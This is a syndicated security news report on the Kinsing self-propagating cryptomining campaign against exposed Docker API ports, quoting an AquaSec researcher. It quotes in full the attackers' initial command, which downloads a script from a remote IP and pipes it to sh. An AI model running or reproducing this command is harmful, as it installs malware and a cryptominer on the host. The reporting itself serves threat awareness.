The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports. Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months. However, since the beginning of the year, the number of daily attempts has far exceeded what was seen before, he said. “We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday. Kinsing’s Infection Routine The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance connected to it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts. Click to enlarge: A summary of the attack components. Source: AquaSec. The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 126.96.36.199/d.sh | sh;tail -f /dev/null.” This…
0 0 govanguard https://govanguard.com/wp-content/uploads/2018/04/Header_Logo.png govanguard2020-04-03 15:31:002020-04-03 15:31:00Self-Propagating Malware Targets Thousands of Docker Ports Per Day
Our Standard Office Hours
Monday – Friday: 8:00AM – 5:00PM EDT
Saturday – Sunday: Closed
Where to Find Us
Data Privacy Notice
- – All product names, logos, and brands are property of their respective owners.
- – The use of these names, logos, and brands is for identification purposes only and does not imply endorsement.
- – Content syndication and aggregation of public information is solely for the purpose of identifying information security trends, all syndicated content contains source links to the content creator website. All content is owned by it’s respective content creators.
- – If you are an owner of some content and want it to be removed, please email email@example.com